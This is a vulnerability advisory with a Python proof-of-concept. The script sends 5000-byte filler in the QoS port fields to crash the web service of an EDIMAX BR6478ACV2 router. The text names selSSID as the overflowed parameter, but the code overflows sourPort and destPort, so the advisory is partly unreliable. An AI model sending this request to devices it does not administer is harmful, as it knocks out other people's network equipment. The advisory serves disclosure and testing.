BR6478ACV2_v1.23
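The EDIMAX BR6478ACV2_v1.23 firmware has a buffer overflow vulnerability in the formQoS function. The v3 variables receive the selSSID parameters from a POST request. Because the user controls this input and it is copied with strcpy(), which performs no length check, an over-long value can overflow the destination buffer. Note that the proof-of-concept request below carries its oversized value in the sourPort and destPort fields rather than in selSSID. The fix belongs in the firmware: check the length of each request parameter before copying it, or use a bounded copy sized to the destination buffer.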


import requests
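# Reproduction request for the formQoS overflow described in the advisory text
# above. Its use is to check, on a lab unit you administer, whether a given
# firmware build still mishandles the request or now rejects it.
ip = "192.168.2.1"

# 5000 bytes of filler placed in the two port fields. A well-formed port is a
# short decimal number, so server-side length/format validation of these
# fields would reject this request before any copy takes place.
payload = "A" * 5000

# Form fields of an "add QoS rule" submission. Only sourPort and destPort
# carry the oversized value; every other field is an ordinary or empty value.
# NOTE(review): the advisory text names selSSID as the copied parameter, but
# no selSSID field is sent here -- confirm which field reaches the strcpy().
data = {
    "EZQos_Mode": "",
    "addQos": "1",
    "editQos": "",
    "configWan": "1",
    "configNum": "",
    "isEnabled": "",
    "ruleName": "test",
    "bwidthVal": "100",
    "bwidthType": "0",
    "downUpType": "0",
    "nettype": "",
    "sourType": "0",
    "sourStIp": "192.168.1.100",
    "sourEdIp": "192.168.1.200",
    "destStIp": "192.168.1.100",
    "destEdIp": "192.168.1.200",
    "sourMac": "",
    "trafType": "0",
    "protocol": "0",
    "sourPort": payload,
    "destPort": payload,
    "diffSevType": "",
    "downVal": "",
    "downType": "",
    "portValue": "",
}

url = f"http://{ip}/goform/formQoS"
try:
    # timeout: without one, requests waits indefinitely if the web service
    # stops answering, and the script never reports a result.
    # verify=False has no effect on a plain-http URL; it only matters if the
    # device redirects the request to HTTPS.
    res = requests.post(url=url, data=data, verify=False, timeout=10)
except requests.exceptions.RequestException as exc:
    # No HTTP response at all. On an unfixed unit this is consistent with the
    # web service having gone down; a fixed build is expected to answer with
    # an ordinary HTTP response instead.
    print(f"no HTTP response from {url}: {exc!r}")
else:
    print(res)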